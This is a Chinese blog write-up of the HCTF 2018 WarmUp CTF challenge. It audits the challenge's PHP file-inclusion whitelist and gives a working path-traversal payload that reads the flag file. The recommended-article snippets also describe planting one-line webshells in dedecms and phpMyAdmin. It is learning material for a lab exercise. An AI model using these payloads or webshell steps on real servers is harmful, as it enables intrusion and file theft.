WarmUp1.PHP.代码审计

最新推荐文章于 2024-09-14 17:41:03 发布
最新推荐文章于 2024-09-14 17:41:03 发布
阅读量30 收藏
点赞数
文章标签: php android java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48691188/article/details/133269773
版权

初始页面

没有提示,打开F12寻找信息

提示存在source.php页面,尝试访问,显示源代码,进行代码代码审计。

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

发现白名单中有hint.php文件

尝试访问

可知,flag在ffffllllaaaagggg文件中。

用“?file=hint.php?../../../../../ffffllllaaaagggg”进行访问,得出flag。

weixin_48691188
关注
【网络安全 | CTF】攻防世界 warmup 解题详析
等风来
05-25 3755
该函数接受一个参数 $page,并对其进行三次预处理,分别进行 URL 解码、去掉查询字符串和转换成统一编码,然后依次与白名单中的文件名进行比较,如果匹配成功则返回 true;其次,在主程序中通过判断用户的请求参数 $_REQUEST[‘file’] 是否存在、是否是字符串类型,以及调用 emmm::checkFile 函数的返回结果来决定是否包含相应文件并输出。这段 PHP 代码主要用于检测用户请求的文件是否在白名单之内,如果在则可以包含该文件并输出,否则直接输出一张图片。要想包含特定的文件,则必须。
[HCTF 2018]WarmUp1
qq_48008847的博客
07-16 463
题目打开如上,常规思路先F12看一下网页源码 看到有一个被注释掉的source.php 看一下这是个什么东东 发现是一串代码,下面来审计一下这段代码 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { //白名单列表 $whitelist = ["source"=&g...
[HCTF 2018]WarmUp1PHP 代码审计
qq_51902218的博客
07-22 413
1. 打开就是一张猥琐笑的表情包,没有任何文字信息提示,果断单击右键查看源代码 2. 发现有一个php语言的文件(source.php) 所以直接在地址栏网站名后面加?file=source.php访问(注意:符号必须是英文格式) ...
BUU php代码审计- [HCTF 2018]WarmUp
Ivyyyyyy1的博客
10-14 309
一、题目 滑稽.jpg 看看源代码 发现注释中有提示页面 source.php 访问后得到源码: <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=&...
ctf php代码审计 绕过,CTF代码审计之[HCTF 2018]WarmUp
weixin_32019577的博客
04-11 660
[HCTF 2018]WarmUp{public static function checkFile(&$page){$whitelist = ["source"=>"source.php","hint"=>"hint.php"];if (! isset($page) || !is_string($page)) {echo "you can't see it";return f...
Buuctf-warmup【代码审计
qq_61968245的博客
12-15 1089
0x01 题目链接 https://buuoj.cn/challenges#[HCTF%202018]WarmUphttps://buuoj.cn/challenges#[HCTF%202018]WarmUp 0x02 知识点 isset($name):判断变量是否存在 is_string($name):判断变量是否为字符串 in_array($search,$array):判$search是否在$array数组里 mb_stro...
XCTF 之warm up(代码审计分析)
sunleibaba的博客
01-20 675
XCTF warmup解题思路(详细讲解php代码部分): 废话不多说,进入正题: 点击创建好的环境之后,我们看到了这样一个画面: 网页是一张图片,有点懵,我们先按F12,看一下源代码: 嘿嘿,发现了一个source.php。进行查看发现一系列源代码: php源码解析: 为了便于讲解我们将代码放到notepad++上面: 第1行语句是php语言的固定开头。 第2行:对文件进行php语法高亮显示。 第3行:实例化一个叫emmm的类。 第4行和第11行语句是定义类的固定语法。 第5行:利用静态方法
攻防世界:warmup详解
bjml_的博客
11-14 845
打开场景只有一个滑稽,没有任何描述。
2021-03-10-PHP代码审计
qq_50963064的博客
11-15 1013
PHP代码审计题 由于重点是代码审计,所以直接看代码了。 [HCTF 2018]WarmUp <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { //设置白名单 $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
一码空传临时网盘PHP源码,支持提取码功能
爱酷码的博客
09-11 346
一码空传临时网盘源码V2.0免费授权,该源码提供了一个简单易用的无数据库版临时网盘解决方案。前端采用了layui开发框架,后端使用原生PHP编写,没有引入任何开发框架,保持了代码的简洁和高效。这个程序使用了一个无数据库配置读写类,并借鉴了网络上的config文件读写代码。用户可以通过提取码来提取文件,无需上传文件到服务器。该程序还配备了一个后台管理系统,而且不需要数据库支持。用户上传的文件会保存在upload文件夹中,并按照md5算法进行加密和重命名,确保每次加密结果都不相同。
[极客大挑战 2019]Http
2201_75556700的博客
09-10 542
3、访问Secret.php发现页面有提示,它说它不是来自这个网页。6、添加X-Forwarded-For: 127.0.0.1。5、修改User-Agent为:Syclover。2、查看页面源码发现一个。
dedecms(四种webshell姿势)
最新发布
2301_81881972的博客
09-14 800
点击【系统】【sql命令行工具】--》多行命令中输入select '<?>' into outfile '+路径+创建文件名。与WPCMS类似,直接修改模板拿WebShel..点击【模板】--》【默认模板管理】【index.htm】-->【修改】在文件修改中添加一句话代码.....如下。点击【模块】【广告管理】--》〔【增加一个新广告】 --》在 【广告内容】 处添加一句话代码--》点击 【确定】账号密码同为admin。
Thinkphp5实现一周签到打卡功能
Crazy_shark的博客
09-10 741
以上是一个简单的 ThinkPHP5 实现一周签到打卡功能的示例。通过设计合适的数据库结构和控制器逻辑,你可以轻松实现用户签到和连续签到天数统计功能。在实际应用中,可能需要考虑更多的细节,如用户身份验证、签到奖励、接口优化等。
【2025】基于PHP职业病健康管理系统(源码+论文+部署讲解等)
程序员阿龙的博客
09-10 1876
博主介绍: ✌我是阿龙,一名专注于Java技术领域的程序员,全网拥有10W+粉丝。作为CSDN特邀作者、博客专家、新星计划导师,我在计算机毕业设计开发方面积累了丰富的经验。同时,我也是掘金、华为云、阿里云、InfoQ等平台的优质作者。通过长期分享和实战指导,我致力于帮助更多学生完成毕业项目和技术提升。 技术范围: 我熟悉的技术领域涵盖SpringBoot、Vue、SSM、HLMT、Jsp、PHP、Nodejs、Python、爬虫、数据可视化、小程序、安卓app、大数据、物联网、机器学习等方
Thinkphp5 + Swoole实现邮箱异步通知
Crazy_shark的博客
09-11 604
通过 Swoole 实现的异步任务处理机制,可以将耗时操作如发送邮件等操作放入后台异步执行,提升用户体验和系统性能。Swoole 的 Task 机制非常适合处理这种场景,结合 ThinkPHP 使得开发异步任务更加简单高效。
php+mysql日志审计管理系统
python0328的博客
09-10 478
本系统实现了:用户登陆、日志审计、监控规则、用户管理。
【getshell】phpmyadmin后台getshell(4.8.5)
m0_71944965的博客
09-11 628
访问一下 最后getshell
thinkphp6 事务不起作用了咋回事
f897907070的博客
09-11 335
在用到事务的时候 用的tp6事务 写完代码,抛出异常的时候,数据库的数据,依然在变化,在执行,就很纳闷,事务不是抛出异常,就不会执行吗,难道自己写错了,反复看了好几遍代码,感觉也没有用处,但是代码就是在执行了。但是选了时候,保存的时候,还是报错,此时需要注意下 行格式也要改 ,选成Dynamic。于是静下心来想了下,原来是数据库的存储引擎选错了,用了myisam 而是要用InnoDB。如图 保存成功之后,事务正常使用了,遇到异常,也就正常回滚了。
zuul.ribbon.warmup=true
06-09
这是Netflix Zuul中Ribbon负载均衡器的一个配置选项,用于在启动时预热Ribbon客户端的连接池。当设置为true时,Zuul会在启动时创建一定数量的连接,并将它们放入连接池中。这样,当第一次请求到达时,连接池中已经有一些可用的连接,可以更快地响应请求。 预热连接池的好处是可以尽早地发现连接池中的错误连接,从而及时地重新创建并替换它们。同时,预热还可以减少第一次请求的响应时间,提高系统的性能。 需要注意的是,预热连接池会占用一定的资源,如果资源有限,可以根据实际情况进行调整。同时,预热连接池也不能完全避免连接池中的错误连接,需要定期检查并重新创建连接。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值